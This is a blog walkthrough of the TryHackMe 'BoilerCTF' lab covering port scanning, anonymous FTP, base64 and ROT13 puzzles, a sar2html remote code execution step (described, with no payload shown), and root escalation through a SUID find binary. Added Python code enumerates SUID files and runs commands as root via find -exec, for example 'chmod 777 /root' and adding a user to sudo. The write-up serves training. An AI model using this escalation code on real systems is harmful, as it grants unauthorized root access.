Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

BoilerCTF

Another room from TryHackMe and it’s rated as intermediate. Let’s start by running a port scan.

Enumeration

Nmap reports the host as down. Let's see if I can ping the machine.

Yes I can. For those who wonder why I ping boilerctf.thm: this is because I get an hour for a room at TryHackMe. If I run out of time or restart the room, I get another IP address to attack. When I add the current IP address to /etc/hosts, I can use the domain name instead of remembering the IP address with every change.

Because I can ping the machine, I run the port scan again, this time with the option -Pn, which tells nmap to skip host discovery and treat the target as online even when its discovery probes get no answer.

With this option nmap gives a better result. The following ports are open:

  • 21 | FTP (vsftpd version 3.0.3)
  • 80 | HTTP (Apache version 2.4.18 for Ubuntu)
  • 10000 | HTTP (MiniServ version 1.930)
  • 55007 | SSH (OpenSSH version 7.2p2)

FTP

From the nmap scan I can see that anonymous login is enabled on this FTP server. So let’s see if there is something useful to be found.

There is a file with the extension txt. If I had only used the command ls or dir, I wouldn't have found anything, because the file is hidden (its name starts with a dot); ls -a lists those too. I also used the -p option to enable passive FTP. This way the client (me) initiates both the control and the data connection, instead of active FTP, where the server opens the data connection back to the client from port 20 (which a firewall or NAT on my side would block).

I downloaded the file. Now to see what’s in it.

My first guess is some kind of rotation cipher: the dots ending the sentences, the colon and the exclamation mark are left untouched, which is what a letters-only substitution does. A nifty site for trying this is CyberChef, which can brute force the shifts or run a frequency analysis on the sequence.

My first guess was correct: when I choose ROT13 I get a readable string: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

No real info, so on to the next service.

Webserver

When directing my browser to the site I get a default Apache page. From the nmap scan I know there is a robots.txt file.

And this is why I like CTF based challenges. Is this a rabbit hole or a puzzle that needs to be solved? While wrapping my head around this string, I run a web fuzzer in the background. There are many tools for this, like Gobuster, Dirb, Dirbuster and many more. I like DirSearch a lot. This tool doesn't come with Kali by default; if you want to give it a try, you can find it on GitHub.

With this tool I used a few flags to get a better result. The -u flag is mandatory, as it defines the URL to scan. The -e flag selects the extensions to try; it is mandatory too and needs at least one extension, and you can add more by separating them with a comma. The -f flag forces the extensions onto every word of the wordlist (the same as Dirbuster can do), and the -x flag excludes responses with the given HTTP status codes (typically 404 Not Found, and 403 Forbidden for directories that exist but may not be listed; note that 400 means Bad Request, not Not Found). Another very useful flag is -w, which lets you choose the wordlist. For more options there is always -h.

I could use the -r flag, which makes DirSearch recurse into every directory it finds (which I prefer not to do), so instead I run another targeted scan on the /joomla/ folder.

The first two hits look a bit off. When I curl them I get some base64 encoded text.

To decode base64 you can use an online tool or the base64 -d command that ships with Kali.

More base64. One more time by hand and if there is more, I’ll try a loop.
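The loop mentioned above, written out as an added example (not the write-up's own script and not the challenge's strings): it keeps decoding while the data is valid, padded base64 that re-encodes to itself, and reports how many layers it removed. The sample is constructed inline by wrapping a sentence in three layers. One caveat: plain text made only of base64 alphabet characters with a length that is a multiple of four (such as "abcd") also passes the check and would be peeled one layer too far, which is why the result is shown as raw bytes and the loop is capped.

```python
"""Peel nested base64 layers until the data no longer decodes cleanly.
Added example; the CTF's actual strings are not reproduced here."""
import base64
import binascii


def is_canonical_base64(data: bytes) -> bool:
    """True only if `data` is valid, padded base64 that re-encodes to itself.
    Whitespace (line wraps from curl or echo) is ignored."""
    stripped = b"".join(data.split())
    if not stripped or len(stripped) % 4:
        return False
    try:
        decoded = base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return False
    return base64.b64encode(decoded) == stripped


def peel(blob: bytes, max_layers: int = 64):
    """Return (innermost_bytes, layers_removed). max_layers guards against
    input that happens to decode forever."""
    layers = 0
    current = blob
    while layers < max_layers and is_canonical_base64(current):
        current = base64.b64decode(b"".join(current.split()), validate=True)
        layers += 1
    return current, layers


# Constructed sample: a sentence wrapped in three layers of base64.
SECRET = b"Constructed sample, not the challenge text."
SAMPLE = SECRET
for _ in range(3):
    SAMPLE = base64.b64encode(SAMPLE)

if __name__ == "__main__":
    inner, count = peel(SAMPLE)
    print(f"{count} layer(s) removed -> {inner!r}")
```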

Guess this was it, but it looks like another rabbit hole. The other folder that looked a bit off was /_test/. When I point my browser at that folder I get an interesting response: this page runs software called sar2html. Sar2html is a web-based front end for performance monitoring; it converts sar binary data into graphs. Its last update was in 2013. Looking in the offline copy of Exploit Database, I can see there is a remote code execution (RCE) vulnerability for it.

That’s not that hard to test.

This exploit seems to work.

With the command cat I can read the file log.txt.


Looks like credentials. I know from the nmap scan that an SSH server is running on port 55007.

Some basic enumeration starts in the home folder of the compromised user and that’s where I find another set of credentials.

Changing user.

Does this user have sudo rights?

And another red herring. Back to his home folder.

Let’s see what is listening.

Looks like a MySQL server is running locally, but it denies every login attempt I try. No go here. From earlier enumeration I saw my current user has LXD rights. This can be a way to escalate privileges, but in this case it looks like a rabbit hole.

Escalation of Privilege

One of the things you need to look at during system enumeration is files with the SUID bit set. What is the SUID bit?

SUID (set user ID upon execution) is a special permission bit on a file. Normally, when a program runs on Linux/Unix, it inherits the permissions of the user who started it. With SUID set, the program runs with the effective user ID of the file's owner rather than that of the user who runs it. When that owner is root, every such binary is a candidate for privilege escalation.

To find files with the SUID bit set, you can run the following command:

With this command I use find to search recursively from the root folder downwards. The -perm flag filters on a specific permission setting; /4000 is the numeric representation of the SUID bit. Because I only want files, I use -type f, and the last flag is -exec, which runs a command on each match (the {} placeholder is replaced by the path). Here I use ls -ld to show the owner of each file and its modification time, which is a good indicator of which file was tampered with or created for the purpose of the challenge. Finally I end with 2>/dev/null, which sends stderr (the permission-denied errors) to /dev/null instead of polluting my results.

In the list of files there is an interesting one, namely the find command itself. As I showed above, find has an -exec flag that runs commands. Because the binary is SUID root, those commands run as root. Let's test this.

In this example I created a file through the -exec flag of find, and it is owned by root with group stoner (SUID only changes the effective user ID; the group still comes from my own session). I can do several things with this, but as I want access to the /root folder, I'm going to give myself better access.

Here I changed the permissions of /root to rwxrwxrwx (777), so everyone can read and enter the files and folders in it. This is fine for a CTF box, but it is a noisy change that you would not make on a real engagement.

Another way of getting access to /root is to add yourself to the sudo group (through the same find -exec trick) and then escalate to root with sudo.

One thing to remember: after I was added to the sudo group I had to start a new login shell with su stoner. Without this step it wouldn't work, because group membership is read when a session starts and my existing shell still had the old group list. After that I used sudo to switch to root, and because the sudo group may run anything as root, there were no restrictions to stop me.
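The enumeration and the find -exec trick from the two steps above, as an added Python example rather than the write-up's own one-liners: `find_suid` is the equivalent of `find / -perm /4000 -type f -exec ls -ld {} + 2>/dev/null` with the results sorted newest-first, and `run_via_find` runs a command once through find's -exec, which inherits the binary's effective UID when find is SUID root. The `stoner` user and the chmod/usermod commands in the comments are the ones the write-up describes; `demo_suid_dir` only exists to create a throwaway SUID file for trying the enumerator without root. One caveat when spawning a shell this way: bash drops an effective UID that differs from the real UID unless it is started with `-p`, which is why acting through single commands such as chmod or usermod (as the write-up does) is the more reliable route.

```python
"""SUID enumeration and the find -exec trick from the write-up, as an added
Python example. Nothing here is the challenge box's code."""
import os
import stat
import subprocess
import tempfile
import time

SKIP = ("/proc", "/sys", "/dev")  # pseudo filesystems: noise, never SUID binaries


def find_suid(root="/"):
    """Walk `root` and return [(path, owner_uid, mtime)] for regular files with
    the SUID bit, newest first. Equivalent of
    find / -perm /4000 -type f -exec ls -ld {} + 2>/dev/null."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP
                       and not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # the 2>/dev/null of the shell version
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid, st.st_mtime))
    found.sort(key=lambda t: t[2], reverse=True)  # freshly planted files float up
    return found


def is_suid(path):
    """True if the SUID bit is set on `path` (same test as `test -u`)."""
    return bool(os.lstat(path).st_mode & stat.S_ISUID)


def run_via_find(command, find_binary="find"):
    """Run `command` exactly once through find's -exec and return its stdout.
    With a SUID-root find the child keeps euid 0 (real uid is unchanged), so
    e.g. run_via_find("chmod 777 /root") or
    run_via_find("usermod -aG sudo stoner") work as in the write-up.
    '/ -prune' evaluates the expression for / only, so -exec fires once."""
    argv = [find_binary, "/", "-prune", "-exec", "sh", "-c", command, ";"]
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout.strip()


def demo_suid_dir():
    """Create a temp dir with one SUID file and one plain file (constructed
    sample for trying find_suid without root). Returns (dir, suid_path)."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    suid_path = os.path.join(d, "suid_demo")
    plain_path = os.path.join(d, "plain")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return d, suid_path


if __name__ == "__main__":
    for path, uid, mtime in find_suid("/usr/bin")[:10]:
        stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        print(f"{stamp}  uid={uid}  {path}")
    print(run_via_find("id"))  # shows euid=0 only if find is SUID root
```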

And there you have it. A really fun CTF based challenge to test your skills and learn some new things.
